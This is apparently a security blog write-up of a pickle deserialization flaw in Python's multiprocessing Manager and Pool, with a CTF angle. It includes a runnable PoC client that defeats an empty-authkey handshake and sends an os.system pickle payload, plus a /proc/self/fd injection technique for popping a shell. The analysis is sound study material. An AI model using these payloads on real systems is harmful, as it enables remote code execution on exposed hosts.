CVE-2020-10796

Vulnerability Description

The multiprocessing package is Python's multi-process management package. Its Manager class provides a way to create shared data so that it can be shared between different processes, and even across machines over the network. A Manager maintains a server process that manages the shared objects; other processes access those shared objects through proxies.
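For context, this is roughly how a benign client is meant to talk to such a manager (a minimal sketch; the address, authkey and the get_q typeid are taken from the server.py shown below):

from multiprocessing.managers import BaseManager

class QManager(BaseManager):
    pass

# Register the same typeid the server exposes; no callable is needed client-side.
QManager.register('get_q')

if __name__ == '__main__':
    m = QManager(address=('127.0.0.1', 8500), authkey=b'')
    m.connect()        # performs the HMAC challenge/response using authkey
    proxy = m.get_q()  # returns a proxy for the shared Q instance on the server
    print(proxy)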

The root cause: the default serializer used by Manager and BaseManager in the multiprocessing module is pickle, so an attacker who can reach the manager's listener can send a malicious pickle payload and trigger the bug. Successful exploitation gives arbitrary code execution on the victim host. The main process and its child processes also exchange data via pickle serialization, so if an attacker can control the data passed back to the main process while a child process is running, they can feed in malicious pickle data and cause a pickle deserialization vulnerability.
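The underlying primitive is simply pickle deserializing attacker-controlled bytes. A minimal illustration (not part of the original PoC; the command is arbitrary):

import os
import pickle

class Evil:
    def __reduce__(self):
        # pickle will call os.system('id') while reconstructing the object
        return (os.system, ('id',))

payload = pickle.dumps(Evil())   # bytes an attacker can hand to any pickle.loads()
pickle.loads(payload)            # executes `id` -- the primitive this CVE abuses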

Reproduction

The PoC is public.
server.py

from multiprocessing.managers import BaseManager

class Q():
    pass

class QManager(BaseManager):
    pass

if __name__ == '__main__':
    q = Q()

    def get_q():
        return q

    QManager.register('get_q', callable=get_q)

    # A concrete IP address must be given; it cannot be an empty string
    m = QManager(address=('127.0.0.1', 8500), authkey=b'')

    print("Server starting on 127.0.0.1:8500...")
    print("Vulnerable to CVE-2020-10796 (pickle deserialization)")

    s = m.get_server()
    s.serve_forever()

poc.py

import os
import io
import pickle
import socket
import struct

MESSAGE_LENGTH = 20
CHALLENGE = b'#CHALLENGE#'
WELCOME = b'#WELCOME#'
FAILURE = b'#FAILURE#'

def deliver_challenge(io, authkey):
    import hmac
    if not isinstance(authkey, bytes):
        raise ValueError(
            "Authkey must be bytes, not {0!s}".format(type(authkey)))
    message = os.urandom(MESSAGE_LENGTH)
    send_bytes(io, CHALLENGE + message)
    digest = hmac.new(authkey, message, 'md5').digest()
    response = recv_bytes(io, 256)        # reject large message
    if response == digest:
        send_bytes(io, WELCOME)
    else:
        send_bytes(io, FAILURE)
        # raise AuthenticationError('digest received was wrong')

def answer_challenge(io, authkey):
    import hmac
    if not isinstance(authkey, bytes):
        raise ValueError(
            "Authkey must be bytes, not {0!s}".format(type(authkey)))
    message = recv_bytes(io, 256)         # reject large message
    assert message[:len(CHALLENGE)] == CHALLENGE, 'message = %r' % message
    message = message[len(CHALLENGE):]
    print(message)
    digest = hmac.new(authkey, message, 'md5').digest()
    print(digest)
    send_bytes(io, digest)
    response = recv_bytes(io, 256)        # reject large message
    if response != WELCOME:
        # raise AuthenticationError('digest sent was rejected')
        pass

def send_bytes(io, buf):
    n = len(buf)
    if n > 0x7fffffff:
        pre_header = struct.pack("!i", -1)
        header = struct.pack("!Q", n)
        io.send(pre_header)
        io.send(header)
        io.send(buf)
    else:
        # For wire compatibility with 3.7 and lower
        header = struct.pack("!i", n)
        if n > 16384:
            # The payload is large so Nagle's algorithm won't be triggered
            # and we'd better avoid the cost of concatenation.
            io.send(header)
            io.send(buf)
        else:
            # Issue #20540: concatenate before sending, to avoid delays due
            # to Nagle's algorithm on a TCP socket.
            # Also note we want to avoid sending a 0-length buffer separately,
            # to avoid "broken pipe" errors if the other end closed the pipe.
            io.send(header + buf)

def recv_bytes(io, maxsize=None):
    buf = io.recv(4)
    size, = struct.unpack("!i", buf)
    if size == -1:
        buf = io.recv(8)
        size, = struct.unpack("!Q", buf)
    if maxsize is not None and size > maxsize:
        return None
    return io.recv(size)

# answer_challenge(c, authkey)
# deliver_challenge(c, authkey)

class POC():
    def __reduce__(self):
        print(1)
        return (os.system, ('echo "success" >> /home/sheep/suuuucccesss.txt',))

ip_port = ('127.0.0.1', 8500)
io = socket.socket()
io.connect(ip_port)
answer_challenge(io, b'')
deliver_challenge(io, b'')
poc = POC()
send_bytes(io, pickle.dumps(poc))



cool~, the command executes successfully.
Note that the server must be started with

authkey=b''

otherwise the PoC cannot pass the HMAC challenge and the payload is never delivered.
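The reason is that the authkey is the only secret in the handshake: the client has to compute an HMAC-MD5 over the 20 random challenge bytes with the authkey, exactly as answer_challenge() above does. With authkey=b'' anyone can produce a valid answer. A small illustration (the challenge bytes here are placeholders, not what a real server sends):

import hmac

authkey = b''            # must match the server's authkey
challenge = b'A' * 20    # placeholder for the random bytes sent after b'#CHALLENGE#'
digest = hmac.new(authkey, challenge, 'md5').digest()
print(digest.hex())      # what answer_challenge() would send back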

Root Cause Analysis

Understanding the multiprocessing library via the official documentation

The Pool class

In this library, creating a Pool object spawns the pool of worker processes (the workers are started inside __init__ via _repopulate_pool()).
Its implementation:

def __init__(self, processes=None, initializer=None, initargs=(),
             maxtasksperchild=None, context=None):
    # Attributes initialized early to make sure that they exist in
    # __del__() if __init__() raises an exception
    self._pool = []
    self._state = INIT

    self._ctx = context or get_context()
    self._setup_queues()
    self._taskqueue = queue.SimpleQueue()
    # The _change_notifier queue exist to wake up self._handle_workers()
    # when the cache (self._cache) is empty or when there is a change in
    # the _state variable of the thread that runs _handle_workers.
    self._change_notifier = self._ctx.SimpleQueue()
    self._cache = _PoolCache(notifier=self._change_notifier)
    self._maxtasksperchild = maxtasksperchild
    self._initializer = initializer
    self._initargs = initargs

    if processes is None:
        processes = os.cpu_count() or 1
    if processes < 1:
        raise ValueError("Number of processes must be at least 1")
    if maxtasksperchild is not None:
        if not isinstance(maxtasksperchild, int) or maxtasksperchild <= 0:
            raise ValueError("maxtasksperchild must be a positive int or None")

    if initializer is not None and not callable(initializer):
        raise TypeError('initializer must be a callable')

    self._processes = processes
    try:
        self._repopulate_pool()
    except Exception:
        for p in self._pool:
            if p.exitcode is None:
                p.terminate()
        for p in self._pool:
            p.join()
        raise

    sentinels = self._get_sentinels()

    self._worker_handler = threading.Thread(
        target=Pool._handle_workers,
        args=(self._cache, self._taskqueue, self._ctx, self.Process,
              self._processes, self._pool, self._inqueue, self._outqueue,
              self._initializer, self._initargs, self._maxtasksperchild,
              self._wrap_exception, sentinels, self._change_notifier)
        )
    self._worker_handler.daemon = True
    self._worker_handler._state = RUN
    self._worker_handler.start()

    self._task_handler = threading.Thread(
        target=Pool._handle_tasks,
        args=(self._taskqueue, self._quick_put, self._outqueue,
              self._pool, self._cache)
        )
    self._task_handler.daemon = True
    self._task_handler._state = RUN
    self._task_handler.start()

    self._result_handler = threading.Thread(
        target=Pool._handle_results,
        args=(self._outqueue, self._quick_get, self._cache)
        )
    self._result_handler.daemon = True
    self._result_handler._state = RUN
    self._result_handler.start()

    self._terminate = util.Finalize(
        self, self._terminate_pool,
        args=(self._taskqueue, self._inqueue, self._outqueue, self._pool,
              self._change_notifier, self._worker_handler, self._task_handler,
              self._result_handler, self._cache),
        exitpriority=15
        )
    self._state = RUN
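For orientation before stepping into map(), here is a minimal (hypothetical) way this machinery is normally driven; square is just a stand-in worker function:

from multiprocessing import Pool

def square(x):
    return x * x

if __name__ == '__main__':
    with Pool(processes=2) as p:
        # Each task travels: _taskqueue -> _handle_tasks -> inqueue pipe -> worker,
        # and the result comes back over the outqueue pipe to _handle_results.
        print(p.map(square, range(5)))   # [0, 1, 4, 9, 16]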

The key point: step into the source of the map() method and see what it does:

return self._map_async(func, iterable, mapstar, chunksize).get()

Keep stepping into _map_async:

self._check_running()
if not hasattr(iterable, '__len__'):
    iterable = list(iterable)

if chunksize is None:
    chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
    if extra:
        chunksize += 1
if len(iterable) == 0:
    chunksize = 0

task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self, chunksize, len(iterable), callback,
                   error_callback=error_callback)
self._taskqueue.put(
    (
        self._guarded_task_generation(result._job,
                                      mapper,
                                      task_batches),
        None
    )
)
return result

Focus on the _guarded_task_generation function; stepping into its implementation:

def _guarded_task_generation(self, result_job, func, iterable):
    try:
        i = -1
        for i, x in enumerate(iterable):
            yield (result_job, i, func, (x,), {})
    except Exception as e:
        yield (result_job, i+1, _helper_reraises_exception, (e,), {})

Its core purpose: package each item of the iterable into a task tuple for the workers to execute,
and put those tasks into self._taskqueue (a thread-level queue internal to the parent process). A quick illustration of the tuple shape follows.
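This is only an illustration (it ignores the chunking and the mapstar wrapper that map() actually adds; job id 0 and abs are arbitrary stand-ins), showing the (job_id, task_index, callable, args, kwargs) shape:

def tasks(job, func, iterable):
    # same tuple shape as _guarded_task_generation yields
    for i, x in enumerate(iterable):
        yield (job, i, func, (x,), {})

print(list(tasks(0, abs, [-1, -2, -3])))
# [(0, 0, <built-in function abs>, (-1,), {}), (0, 1, ..., (-2,), {}), (0, 2, ..., (-3,), {})]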
Next, follow the handler thread implementations.
The two that matter most are:
Pool._handle_tasks
Pool._handle_results

The first:

def _handle_tasks(taskqueue, put, outqueue, pool, cache):
    thread = threading.current_thread()

    for taskseq, set_length in iter(taskqueue.get, None):
        task = None
        try:
            # iterating taskseq cannot fail
            for task in taskseq:
                if thread._state != RUN:
                    util.debug('task handler found thread._state != RUN')
                    break
                try:
                    put(task)
                except Exception as e:
                    job, idx = task[:2]
                    try:
                        cache[job]._set(idx, (False, e))
                    except KeyError:
                        pass
            else:
                if set_length:
                    util.debug('doing set_length()')
                    idx = task[1] if task else -1
                    set_length(idx + 1)
                continue
            break
        finally:
            task = taskseq = job = None
    else:
        util.debug('task handler got sentinel')

    try:
        # tell result handler to finish when cache is empty
        util.debug('task handler sending sentinel to result handler')
        outqueue.put(None)

        # tell workers there is no more work
        util.debug('task handler sending sentinel to workers')
        for p in pool:
            put(None)
    except OSError:
        util.debug('task handler got OSError when sending sentinels')

    util.debug('task handler exiting')

The put callable here is the one passed in from the Pool; it is set up here:

def _setup_queues(self):
    self._inqueue = self._ctx.SimpleQueue()
    self._outqueue = self._ctx.SimpleQueue()
    self._quick_put = self._inqueue._writer.send
    self._quick_get = self._outqueue._reader.recv

Under the hood this queue is implemented with a pipe, so ultimately it corresponds to file descriptors (fds).
The send() method serializes (pickles) the object and writes it to the pipe; recv() reads from the pipe and deserializes (unpickles) it.

Pipe() returns two connection objects representing the two ends of the pipe. Each connection object has send() and recv() methods (among others). Note that data in a pipe may become corrupted if two processes (or threads) try to read from or write to the same end of the pipe at the same time. Of course there is no risk of corruption from processes using different ends of the pipe at the same time.
The send() method serializes the object and recv() re-creates the object.
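Because recv() unpickles whatever arrives on the fd, it does not matter whether the bytes were produced by a cooperating send() or written to the fd directly. A minimal sketch of that point (assumes Linux with the default fork start method; the 4-byte big-endian length header matches the framing used in the PoC's send_bytes above):

import os
import pickle
import struct
import multiprocessing as mp

class Evil:
    def __reduce__(self):
        return (os.system, ('id',))

def child(fd):
    # Write a pre-built pickle stream straight to the pipe fd,
    # framed the same way Connection.send() would frame it.
    payload = pickle.dumps(Evil())
    os.write(fd, struct.pack("!i", len(payload)) + payload)

if __name__ == '__main__':
    reader, writer = mp.Pipe(duplex=False)
    p = mp.Process(target=child, args=(writer.fileno(),))
    p.start()
    print(reader.recv())   # recv() unpickles the raw bytes -> os.system('id') runs here
    p.join()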

Now look at the second function:

def _handle_results(outqueue, get, cache):
    thread = threading.current_thread()

    while 1:
        try:
            task = get()
        except (OSError, EOFError):
            util.debug('result handler got EOFError/OSError -- exiting')
            return

        if thread._state != RUN:
            assert thread._state == TERMINATE, "Thread not in TERMINATE"
            util.debug('result handler found thread._state=TERMINATE')
            break

        if task is None:
            util.debug('result handler got sentinel')
            break

        job, i, obj = task
        try:
            cache[job]._set(i, obj)
        except KeyError:
            pass
        task = job = obj = None

    while cache and thread._state != TERMINATE:
        try:
            task = get()
        except (OSError, EOFError):
            util.debug('result handler got EOFError/OSError -- exiting')
            return

        if task is None:
            util.debug('result handler ignoring extra sentinel')
            continue
        job, i, obj = task
        try:
            cache[job]._set(i, obj)
        except KeyError:
            pass
        task = job = obj = None

    if hasattr(outqueue, '_reader'):
        util.debug('ensuring that outqueue is not full')
        # If we don't make room available in outqueue then
        # attempts to add the sentinel (None) to outqueue may
        # block. There is guaranteed to be no more than 2 sentinels.
        try:
            for i in range(10):
                if not outqueue._reader.poll():
                    break
                get()
        except (OSError, EOFError):
            pass

    util.debug('result handler exiting: len(cache)=%s, thread._state=%s',
               len(cache), thread._state)

Same as above: this is the parent process doing the reading and writing on its side of the pipes.
There is one more piece, the worker loop running in the child process (simplified):

while True:
    task = inqueue.get()             # read a task from the pipe/fd (pickled data)
    if task is None:
        break
    result = func(*task[3])          # run the actual work, e.g. convert_image
    outqueue.put((index, result))    # pickle the result back onto the fd

That is the child process's side of the reading and sending.

Key Takeaway

Generally speaking, we hand objects to the pool via the map() method, and the data then follows this path:

parent pickles the task object -> parent's write end of the task pipe (an fd) -> child reads from the pipe, unpickles and executes it -> child pickles the result and writes it back onto the result pipe, which the parent reads

The fds themselves are created with os.pipe().
Normally this flow is fine and there is no vulnerability.
But if, while the child process is running, we can overwrite a file or write data into /proc/self/fd/x, the main process will read those bytes and deserialize them directly, and the vulnerability appears.
One caveat: writing with a plain open()/write() does not work.
That was exactly the situation in that Hitcon challenge.
Pinning down the actual fd involves a bit of guesswork.
If you run it locally in docker, you can look up the fds for the corresponding pid:
ls -al /proc/7/fd

import os

def list_fds_brief(label):
    """Print a brief listing of /proc/self/fd (fd -> target)."""
    pid = os.getpid()
    print(f"\n---- {label} (pid={pid}) ----")
    try:
        fds = sorted(os.listdir('/proc/self/fd'), key=lambda x: int(x))
    except Exception as e:
        print("Cannot list /proc/self/fd:", e)
        return
    for fd in fds:
        try:
            target = os.readlink(f'/proc/self/fd/{fd}')
        except Exception as e:
            target = f"<err:{e}>"
        print(f"fd {fd:>2} -> {target}")
    print("---- end ----\n")


Interestingly, to deepen the understanding of this CVE, the focus has to shift to the Image.save method. Even lower level? What other lower-level functions could be used?
Beyond that question, there is also the question of how the PoC itself is put together.
But this post is mainly about the CVE, so I will stop here.

Postscript

I spent almost half a day putting together a similar challenge, only to find that the deserialization simply would not trigger; the logs never even reached the point of asking for a key. While puzzling over it I kept stripping the code down, but the problem persisted. In the end I realized that, because I only wanted to test the CVE, I had naively assumed it was enough to overwrite the file behind the file descriptor and used open(); that does not actually work. You have to go through the lower-level img.save.
For example:

Process ForkPoolWorker-2:
Traceback (most recent call last):
  File "/usr/local/lib/python3.13/multiprocessing/process.py", line 313, in _bootstrap
    self.run()
    ~~~~~~~~^^
  File "/usr/local/lib/python3.13/multiprocessing/process.py", line 108, in run
    self._target(*self._args, **self._kwargs)
    ~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.13/multiprocessing/pool.py", line 114, in worker
    task = get()
  File "/usr/local/lib/python3.13/multiprocessing/queues.py", line 387, in get
    return _ForkingPickler.loads(res)
           ~~~~~~~~~~~~~~~~~~~~~^^^^^
_pickle.UnpicklingError: invalid load key, '\x00'.

This shows that the injected data is indeed reaching the unpickling call~
In my tests the working fd was basically 6 or 10; if it does not work, just restart the environment and try again. It is a bit luck-dependent, but it really does pop a shell in the end.